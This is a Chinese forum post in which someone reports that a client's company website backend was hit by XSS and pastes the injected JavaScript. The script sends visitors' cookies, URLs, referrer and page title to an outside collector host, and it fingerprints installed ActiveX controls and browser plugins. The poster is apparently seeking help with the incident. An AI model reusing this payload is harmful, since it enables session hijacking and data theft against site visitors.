|
有个客户企业网站后台被xss了,特有此问
- var x=new Image();
- try
- {
- var myopener='';
- myopener=window.opener && window.opener.location ? window.opener.location : '';
- }
- catch(err)
- {
- }
- x.src='http://xss.re/XSS/?do=api&act=r&id=2603&diy[location]='+escape(document.location)+'&diy[toplocation]='+escape(top.document.location)+'&diy[cookie]='+escape
- (document.cookie)+'&diy[opener]='+escape(myopener)+'&diy[referrer]='+escape(document.referrer)+'&diy[title]='+escape(document.title);var activexa = new Array(
- "Flash Player 8|ShockwaveFlash.ShockwaveFlash.8|classID",
- "Flash Player 9|ShockwaveFlash.ShockwaveFlash.9|classID",
- "360Safe|360SafeLive.Update|classID",
- "Alibaba User(AliEdit)|Aliedit.EditCtrl|classID",
- "CMB Bank|CMBHtmlControl.Edit|classID",
- "Apple IPOD USER|IPodUpdaterExt.iPodUpdaterInterface|classID",
- "Apple iTunes|iTunesAdmin.iTunesAdmin|classID",
- "JRE 1.7|JavaWebStart.isInstalled.1.7.0.0|classID",
- "JRE 1.6(WebStart)|JavaWebStart.isInstalled.1.6.0.0|classID",
- "KMPlayer|KMPlayer.TKMPDropTarget|classID",
- "KingSoft Word(�ʰ�)|KSEngine.Word|classID",
- "Windows live Messanger|Messenger.MsgrObject|classID",
- "Nero|NeroFileDialog.NeroFileDlg|classID",
- "Nokia Cellphone|NokiaCL.PhoneControl|classID",
- "PPlayer|PPlayer.XPPlayer|classID",
- "Tencent QQ|Qqedit.PasswordEditCtrl|classID",
- "QuickTime|QuickTime.QTElementBehavior|classID",
- "Symantec Anti-Virus|Symantec.stInetTransferItem|classID",
- "Xunlei|XunLeiBHO.ThunderIEHelper|classID"
- );
- function iescan(){
- var mytmp;
- var plus;
- var bar;
- var x=new Image();
- for (i=0; i<activexa.length; i++){
- mytmp = activexa[i].split('|');
- if ( checkobj(mytmp[1]) == true ){
- plus+="|"+mytmp[0]+"<br>";
-
- }
- }
- bar = escape(plus);
- x.src='http://xss.re/XSS/?do=api&act=r&id=2603&a=cplus&plus='+bar+'&diy[location]='+escape(document.location)+'&diy[toplocation]='+escape(top.document.location)+'&diy[cookie]='+escape(document.cookie)+'&diy[opener]='+escape(document.myopener)+'&diy[referrer]='+escape(document.referrer)+'&diy[title]='+escape(document.title);
- }
- function checkobj(objName){
- try {
- var Obj = new ActiveXObject(objName);
- return true;
- } catch (e){
- return false;
- }
- }
- //-------------
- function check_plus() {
- var plus = "";
- var bar = "";
- var b=new Image();
- var num_of_plugins = navigator.plugins.length;
- for (var i=0; i < num_of_plugins; i++) {
- plus+= navigator.plugins[i].name+" | "+ navigator.plugins[i].filename +"<br>";
- }
- bar = escape(plus);
- b.src='http://xss.re/XSS/?do=api&act=r&id=2603&a=cplus&plus='+bar+'&diy[location]='+escape(document.location)+'&diy[toplocation]='+escape(top.document.location)+'&diy[cookie]='+escape(document.cookie)+'&diy[opener]='+escape(myopener)+'&diy[referrer]='+escape(document.referrer)+'&diy[title]='+escape(document.title);
- }
- function MyPlusCheck() {
- if(!+[1,]){
- iescan();
- }else{
- check_plus();
- }
- }
- setTimeout("MyPlusCheck()", 3000);
复制代码 |
|